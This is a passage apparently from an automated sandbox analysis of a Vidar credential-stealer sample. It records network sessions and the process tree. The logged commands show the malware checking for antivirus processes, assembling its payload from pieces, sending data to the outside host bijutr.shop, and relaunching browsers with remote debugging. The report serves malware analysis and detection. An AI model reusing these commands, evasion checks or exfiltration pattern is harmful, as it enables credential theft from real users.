                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 16:15:19 UTC | 5173 | OUT |
                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T16:15:17.175Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
2024-12-23 16:15:19 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=546aae7c282d4b649375037f7548f028&HASH=546a&LV=202412&V=4&LU=1734970519621; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=5441106e11374c6fa24a26c13344e660; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2445
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:19 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 50013 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:19 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----S0HDTJW4EU3E37900ZUA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:19 UTC | 453 | OUT | Data Ascii: ------S0HDTJW4EU3E37900ZUAContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------S0HDTJW4EU3E37900ZUAContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------S0HDTJW4EU3E37900ZUACont
2024-12-23 16:15:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:15:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:15:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 50012 | 51.104.15.253 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:20 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970517937&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5371
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 16:15:20 UTC | 5371 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T16:15:17.935Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
2024-12-23 16:15:20 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=924b2008d4df49ba9f127f9c1b626e57&HASH=924b&LV=202412&V=4&LU=1734970520342; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:20 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=dba12319ad23497391a25172cb2027dc; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:20 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2405
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 23 Dec 2024 16:15:19 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 50014 | 51.104.15.253 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:20 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970518184&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 9830
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 16:15:20 UTC | 9830 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-23T16:15:18.183Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"loc
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=bbdbff2f9d1f480e86d50f322b9658f9&HASH=bbdb&LV=202412&V=4&LU=1734970520568; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=f63eed6b5c4f4500895b3ef3223437e8; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2384
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:19 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 50020 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:22 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4EKFKNOP8YMYUAI5P89H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 98181
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:22 UTC | 16355 | OUT | Data Ascii:
------4EKFKNOP8YMYUAI5P89H
Content-Disposition: form-data; name="token"

a6e22ef9c5754ecf8211936ed13bd870
------4EKFKNOP8YMYUAI5P89H
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------4EKFKNOP8YMYUAI5P89H
Cont
2024-12-23 16:15:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:15:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:15:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 50031 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:26 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JM79RQ9Z58YM7YUKX4EC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:26 UTC | 331 | OUT | Data Ascii:
------JM79RQ9Z58YM7YUKX4EC
Content-Disposition: form-data; name="token"

a6e22ef9c5754ecf8211936ed13bd870
------JM79RQ9Z58YM7YUKX4EC
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------JM79RQ9Z58YM7YUKX4EC
Cont
2024-12-23 16:15:26 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:15:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:15:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
51  192.168.2.6  50039  188.245.216.205  443  2744  C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp  Bytes transferred  Direction  Data
2024-12-23 16:15:28 UTC  323  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FKXTJEK689RIM7GLFKNY
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:28 UTC  331  OUT  Data Ascii: ------FKXTJEK689RIM7GLFKNYContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------FKXTJEK689RIM7GLFKNYContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------FKXTJEK689RIM7GLFKNYCont
2024-12-23 16:15:29 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:15:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:15:29 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
52  192.168.2.6  50046  20.198.119.84  443
Timestamp  Bytes transferred  Direction  Data
2024-12-23 16:15:31 UTC  71  OUT  Data Ascii: CNT 1 CON 305MS-CV: CGIXwNbYz0yqLB5Z.1Context: de5fd35dfd229426
2024-12-23 16:15:31 UTC  249  OUT  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-23 16:15:31 UTC  1084  OUT  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: CGIXwNbYz0yqLB5Z.2Context: de5fd35dfd229426<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
2024-12-23 16:15:31 UTC  218  OUT  Data Ascii: BND 3 CON\WNS 0 197MS-CV: CGIXwNbYz0yqLB5Z.3Context: de5fd35dfd229426<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-23 16:15:32 UTC  14  IN  Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
Data Ascii: 202 1 CON 58
2024-12-23 16:15:32 UTC  58  IN  Data Ascii: MS-CV: 8C1/1WWH+kyOF/dqBoWyDQ.0Payload parsing failed.


Session ID  Source IP  Source Port  Destination IP  Destination Port
53  192.168.2.6  50120  20.198.119.84  443
Timestamp  Bytes transferred  Direction  Data
2024-12-23 16:16:02 UTC  71  OUT  Data Ascii: CNT 1 CON 305MS-CV: U+oFM3Y0zEKhNv0P.1Context: e96ceffeae195d8d
2024-12-23 16:16:02 UTC  249  OUT  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-23 16:16:02 UTC  1084  OUT  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: U+oFM3Y0zEKhNv0P.2Context: e96ceffeae195d8d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
2024-12-23 16:16:02 UTC  218  OUT  Data Ascii: BND 3 CON\WNS 0 197MS-CV: U+oFM3Y0zEKhNv0P.3Context: e96ceffeae195d8d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-23 16:16:02 UTC  14  IN  Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
Data Ascii: 202 1 CON 58
2024-12-23 16:16:02 UTC  58  IN  Data Ascii: MS-CV: wNW1cQhnOUie/y87E8UcWg.0Payload parsing failed.


Target ID: 0
Start time: 11:13:57
Start date: 23/12/2024
Path: C:\Users\user\Desktop\ChoForgot.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ChoForgot.exe"
Imagebase: 0x400000
File size: 1'111'393 bytes
MD5 hash: 06342512B7BCDFDDA8D6EA8E2D5A24E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID:2
Start time:11:13:57
Start date:23/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:11:13:57
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:11:13:59
Start date:23/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x590000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:11:13:59
Start date:23/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x6a0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:11:14:00
Start date:23/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x590000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:11:14:00
Start date:23/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x6a0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:11:14:00
Start date:23/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 623615
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:11:14:00
Start date:23/12/2024
Path:C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):true
Commandline:extrac32 /Y /E Distances
Imagebase:0xc10000
File size:29'184 bytes
MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:11:14:01
Start date:23/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "Duck" Ix
Imagebase:0x6a0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:11:14:01
Start date:23/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:11:14:01
Start date:23/12/2024
Path:C:\Users\user\AppData\Local\Temp\623615\Wb.com
Wow64 process (32bit):true
Commandline:Wb.com f
Imagebase:0xfb0000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:13
Start time:11:14:01
Start date:23/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0x770000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:11:14:40
Start date:23/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:11:14:41
Start date:23/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:11:14:55
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:11:14:56
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:11:14:56
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:11:14:56
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:11:14:59
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:11:14:59
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
